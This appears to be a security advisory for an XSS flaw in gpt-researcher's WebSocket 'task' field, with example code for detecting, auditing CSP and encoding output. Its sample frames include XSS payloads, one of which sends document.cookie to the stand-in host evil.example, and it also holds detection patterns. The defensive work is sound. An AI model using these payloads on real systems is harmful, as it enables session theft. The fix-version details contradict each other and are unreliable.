Platform: javascript
Component: gpt-researcher
Fixed in: 3.4.1, 3.4.2, 3.4.3, 3.4.4
A cross-site scripting (XSS) vulnerability has been discovered in gpt-researcher versions 3.4.0 through 3.4.3. This flaw stems from improper handling of the 'task' argument within the WebSocket Interface component. Successful exploitation allows an attacker to inject malicious scripts, potentially leading to session hijacking or defacement. The vulnerability is remotely exploitable and a public proof-of-concept is available, highlighting the urgency of remediation.
The primary impact of CVE-2026-5625 is cross-site scripting (XSS). An attacker could use this vulnerability to inject JavaScript into the gpt-researcher application, allowing them to steal user session cookies, redirect users to phishing sites, or deface the application's interface. Given the public availability of an exploit, the risk of exploitation is elevated. The WebSocket Interface carries the client-server messages, including the 'task' value, so it is reachable by anyone who can open a socket to the application. The lack of response from the project developers further exacerbates the risk, as timely security updates are unlikely.
CVE-2026-5625 is a publicly disclosed vulnerability with a readily available proof-of-concept, which significantly increases the likelihood of exploitation. The vulnerability was reported to the project on 2026-04-06, but there has been no response, indicating a possible lack of active maintenance. Note that the EPSS score listed on this page is 0.03% (11th percentile), low despite the public exploit; do not rely on EPSS alone to deprioritise it. Monitor for unusual WebSocket traffic and suspicious JavaScript execution within the gpt-researcher application.
Applications utilizing gpt-researcher versions 3.4.0 through 3.4.3 are at risk, particularly those exposing the WebSocket Interface to untrusted users. Systems with weak input validation or inadequate output encoding are especially vulnerable. Users relying on gpt-researcher for sensitive data processing or authentication are at higher risk of compromise.
• javascript / web: Inspect WebSocket traffic for frames whose 'task' field contains markup or script-like content. Use the browser developer tools (Network tab, WS filter, and the Console) to watch incoming frames and unexpected script execution.
• generic web: Examine access logs and WebSocket message logs for requests carrying potentially malicious payloads in the 'task' parameter, including URL-encoded or HTML-entity-encoded variants.
• generic web: Check response headers for Content-Security-Policy (CSP) directives. Ensure CSP is enabled and that script-src does not permit 'unsafe-inline', wildcards, or data: URLs, so an injected script cannot execute even if the encoding fix is missing.
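The detection checks listed above, worked through as an added example rather than code from the gpt-researcher project: a heuristic scanner for XSS indicators in the 'task' field of WebSocket frames (after decoding common encodings), and a small CSP audit. The JSON frame format `{"task": ...}`, the sample frames and the CSP values are constructed for illustration.

```javascript
// Added example, not gpt-researcher project code. The frame format
// {"task": ...} and the sample data below are assumptions for illustration.

// Patterns commonly seen in XSS payloads. Heuristic, not a parser:
// attackers obfuscate, so treat hits as alerts to triage, not proof.
const XSS_PATTERNS = [
  /<\s*script\b/i,
  /<\s*\/?\s*(iframe|object|embed|svg|img|math)\b/i,
  /\bon[a-z]+\s*=/i,          // inline event handler: onerror=, onload=
  /javascript\s*:/i,          // javascript: URL scheme
  /expression\s*\(/i,
  /srcdoc\s*=/i,
];

// Decode common encodings so "%3Cscript%3E" or "&lt;script&gt;" are
// inspected the same way as the literal characters.
function normalise(value) {
  let s = String(value);
  try { s = decodeURIComponent(s); } catch (_) { /* keep raw on bad %xx */ }
  return s
    .replace(/&lt;/gi, '<')
    .replace(/&gt;/gi, '>')
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
}

// Returns the sources of the patterns that matched; empty if clean.
function findXssIndicators(taskValue) {
  const s = normalise(taskValue);
  return XSS_PATTERNS.filter((re) => re.test(s)).map((re) => re.source);
}

// Inspect one WebSocket text frame. Assumed format: JSON object with a
// "task" field (the argument the advisory names). Other frames are skipped.
function inspectFrame(frameText) {
  let msg;
  try { msg = JSON.parse(frameText); } catch (_) { return null; }
  if (typeof msg !== 'object' || msg === null || !('task' in msg)) return null;
  const hits = findXssIndicators(msg.task);
  return { task: String(msg.task), suspicious: hits.length > 0, hits };
}

// Check a Content-Security-Policy header value for settings that would
// let an injected <script> run anyway. Returns a list of findings.
function auditCsp(headerValue) {
  if (!headerValue) return ['no CSP header'];
  const directives = Object.fromEntries(
    headerValue.split(';').map((d) => d.trim()).filter(Boolean)
      .map((d) => { const [name, ...vals] = d.split(/\s+/); return [name.toLowerCase(), vals]; }),
  );
  const script = directives['script-src'] || directives['default-src'];
  const findings = [];
  if (!script) return ['no script-src or default-src'];
  if (script.includes("'unsafe-inline'")) findings.push("script-src allows 'unsafe-inline'");
  if (script.includes('*')) findings.push('script-src allows any origin (*)');
  if (script.includes('data:')) findings.push('script-src allows data: URLs');
  return findings;
}

// Constructed sample frames (not captured traffic).
const SAMPLE_FRAMES = [
  '{"task":"Summarise recent papers on WebSocket security"}',
  '{"task":"<img src=x onerror=alert(document.cookie)>"}',
  '{"task":"%3Cscript%3Efetch(%27https://evil.example/%27%2Bdocument.cookie)%3C/script%3E"}',
  'ping',
];

// Returns only the frames flagged as suspicious.
function scanFrames(frames) {
  return frames.map(inspectFrame).filter((r) => r && r.suspicious);
}

console.log(JSON.stringify(scanFrames(SAMPLE_FRAMES), null, 2));
console.log(auditCsp("default-src 'self'; script-src 'self' 'unsafe-inline'"));
```

The scanner deliberately decodes before matching: a payload that arrives percent-encoded in a logged frame is the same payload once the client decodes it, and a raw-string grep on the log would miss it.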
curl -s -X POST 'http://your-gpt-researcher-instance/websocket' -d 'task=<malicious_script>' | grep -i 'alert' # Basic check: is the 'task' value echoed back unencoded? Note that this sends a plain HTTP POST, which a WebSocket endpoint will normally reject; use a WebSocket client for a real test.
Disclosure: poc
EPSS: 0.03% (11th percentile)
The recommended mitigation for CVE-2026-5625 is to upgrade to a patched version of gpt-researcher. As no fixed version is currently available, immediate action is required. Implement strict input validation on the 'task' argument, ensuring it conforms to expected formats and lengths. Apply output encoding for the HTML context in which the value is rendered, so injected markup is displayed as text rather than executed by the browser; encoding on output is the fix that actually removes the XSS, validation only narrows the attack surface. Consider a Web Application Firewall (WAF) with rules to detect and block XSS attempts targeting the WebSocket Interface, but note that many WAFs do not inspect WebSocket frame payloads by default, so confirm yours does before relying on it. Regularly review and update security policies to address emerging threats.
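The validation-plus-encoding mitigation above, as an added example that is not gpt-researcher's own code: the vulnerable pattern (the 'task' string spliced into HTML verbatim) beside the hardened one (validated on receipt, HTML-encoded on output). The panel markup, the `{"task": ...}` frame format, the `MAX_TASK_LENGTH` limit and the demo payload are assumptions for illustration.

```javascript
// Added example, not gpt-researcher project code. Markup, frame format
// and limits are assumptions for illustration.

const MAX_TASK_LENGTH = 2000; // assumed limit for a research query

// Vulnerable: the task text is spliced into markup verbatim, so a value
// such as <img src=x onerror=...> becomes live markup once the string is
// assigned to innerHTML.
function renderTaskUnsafe(task) {
  return `<div class="task"><strong>Task:</strong> ${task}</div>`;
}

// Encode the five characters that can change HTML parsing context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Hardened: same markup, but the untrusted value is encoded for the HTML
// text context it lands in. (In a browser, assigning to textContent
// instead of innerHTML achieves the same thing without manual encoding.)
function renderTaskSafe(task) {
  return `<div class="task"><strong>Task:</strong> ${escapeHtml(task)}</div>`;
}

// Input validation on receipt. This bounds what the server accepts; it is
// not a substitute for output encoding, because a legitimate query may
// contain '<' (e.g. "x < y"), so '<' is not rejected here.
function validateTask(raw) {
  if (typeof raw !== 'string') return { ok: false, reason: 'task must be a string' };
  const task = raw.trim();
  if (task.length === 0) return { ok: false, reason: 'task is empty' };
  if (task.length > MAX_TASK_LENGTH) return { ok: false, reason: 'task too long' };
  if (/[\u0000-\u0008\u000B\u000C\u000E-\u001F\u007F]/.test(task)) {
    return { ok: false, reason: 'task contains control characters' };
  }
  return { ok: true, task };
}

// Server side: handle one inbound WebSocket text frame. Assumed format
// {"task": "..."}. Returns the message to send back to the client.
function handleTaskFrame(frameText) {
  let msg;
  try { msg = JSON.parse(frameText); } catch (_) {
    return { type: 'error', message: 'malformed frame' };
  }
  const v = validateTask(msg && msg.task);
  if (!v.ok) return { type: 'error', message: v.reason };
  // The value is returned as data; the client encodes it when rendering.
  return { type: 'task_accepted', task: v.task };
}

// Client side: render an accepted task message safely.
function clientRender(serverMessage) {
  if (serverMessage.type !== 'task_accepted') return null;
  return renderTaskSafe(serverMessage.task);
}

// Constructed demo payload (not a captured exploit).
const PAYLOAD = '<img src=x onerror="alert(document.cookie)">';

console.log('unsafe:', renderTaskUnsafe(PAYLOAD));
console.log('safe:  ', clientRender(handleTaskFrame(JSON.stringify({ task: PAYLOAD }))));
```

The point of the split is that the two controls do different jobs: validateTask stops oversized or malformed input early, while escapeHtml is what prevents the browser from interpreting the payload, so a query like "x < y" still passes and is still rendered harmlessly.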
Upgrade to a fixed version of gpt-researcher that resolves the XSS vulnerability. Check the project's documentation or repository for specific upgrade instructions. Until a fixed version is published, avoid using the application and avoid manipulating the task arguments.
CVE-2026-5625 is a cross-site scripting (XSS) vulnerability affecting gpt-researcher versions 3.4.0–3.4.3. It allows attackers to inject malicious scripts via manipulation of the 'task' argument.
If you are using gpt-researcher versions 3.4.0 through 3.4.3 and have not upgraded, you are potentially affected by this XSS vulnerability.
Upgrade to a patched version of gpt-researcher as soon as one is published. Until then, implement input validation on the 'task' argument and output encoding wherever it is rendered as immediate mitigations.
A public proof-of-concept exists, which raises the likelihood of exploitation even though the EPSS score listed on this page is currently low. Monitor your systems for suspicious activity.
As of the current date, no official advisory has been released by the gpt-researcher project. Monitor the project's repository and communication channels for updates.